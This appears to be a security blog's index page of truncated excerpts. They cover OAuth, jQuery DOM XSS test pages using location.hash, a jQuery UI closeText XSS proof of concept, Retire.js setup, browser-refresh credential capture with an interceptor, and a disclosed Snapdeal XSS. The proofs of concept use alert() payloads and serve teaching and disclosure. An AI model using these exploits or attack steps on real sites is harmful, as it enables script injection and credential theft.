Sekure4Sure

OAuth 2.0 OAuth is an open standard for authorization, commonly used as a way for Internet users to log in to third party websites using their accounts at Google, Facebook, Microsoft, Twitter, etc.—but without exposing their password. Generally, OAuth provides to clients a "secure delegated access" to server resources on behalf of a resource owner. Figure 1 shows the OAuth 2.0 exchange at an abstract level and illustrates the main entities.  For most parts of this document the focus is on the interaction between the Client and the Authorization Server and between the Client and the Resource Server.         +--------+                                                 +---------------+         |             |--(A)- Authorization Request ->|   Resource    |         |             |                                             |      Owner     |         |             |<-(B)-- Authorization Grant ------|                    |         |             |  

This is the code for exploiting (location.hash) JQuery for Cross Site Scripting: <html>     <head>          <title>Jquery XSS Test 1</title>                 <script type="text/javascript"                                             src=" https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js ">                 </script>                 <script>                     $(location.hash.split('#')[1]);                 </script>    </head>      <body>         Jquery DOM XSS     </body> </html> OR, <html>     <head>          <title>Jquery XSS Test 2</title>                 <script type="text/javascript"                                             src=" https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js ">                 </script>                 <

There is a plenty of JavaScript libraries for use on the web and in node.js apps out there. This greatly simplifies, but we need to stay update on security fixes. " Using Components with Known Vulnerabilities " is now a part of the OWASP Top 10 and insecure libraries can pose a huge risk for your webapp. Configure Retire.js for Chrome Browser: Step#1 : Download the  Retire.js  libraries form " https://github.com/RetireJS/retire.js " in zip format. Step#2 : Extract the zip to folder. Step#3 : Now use Bash terminal (Cygwin for Windows) and executes  build_chrome.sh  file. Step#4 : Open Chrome and Go to Extensions tab. Step#5 : Click "Load unpacked extensions" and browse for chrome folder located in  Retire.js  libraries folder. Step#6 : Click Ok button,  Retire.js  extension got installed and listed in tab. Now you can use this extension for finding vulnerabilities in Jquery. Step#

Browser refresh attack is attack which enables an adversary to obtain application credentials by going by to previous page and re-submitting the expired-document. How to perform: Log into to https://<some-site>/login Once logged in, try for change password and logout. Press "Back" on the browser window. Now you'll see the "Document Expired" page. Now run an interceptor (burp/tamper data) Click "Try again" on the web page Click "Re-send data" Watch the intercepted request. You'll observe that login passwords being resubmitted by browser get captured.

It was shocking to get a XSS vulnerability in Snapdeal.com. Recently, I was using snapdeal for purchasing for some goods but when i tried my luck for XSS, it was hardly a matter of seconds. Basically it was DOM based XSS. The requested payload was not going to server. Instead it was being include in DOM itself and executes on browser. Proof of Concept: I used this URL with bcrumbSearch parameter which was used for searching the product name from DOM. As you try to use this URL, script get executes on browser and I got a million dollar smile. Aftermath : As a responsible security researcher, I reported this issue to help@snapdeal.com and support@snapdeal.com. I didn't got any reply from their side yet but meanwhile issue got patched without any intimation.

Vulnerability name: XSS Reflected JQuery UI 1.11.4  I think nearly everyone gets shocked, when your Acunetix shows Cross Site Scripting in Jquery UI. But, may be many of you don’t know how to exploit it. So, here is a Code which will explain how to exploit vulnerabilities like these. Place the script on dialog function as shown in the Code below. <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head>     <title>XSS in closeText option of component ui dialog</title>     <script src="https://code.jquery.com/jquery-2.1.4.js"></script>     <script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>       <script>         $(document).ready(function () {             $('#dialog').dialog({ closeText: ' <script>alert("XSS")<\/script> ' });         });     </script> </head> <body>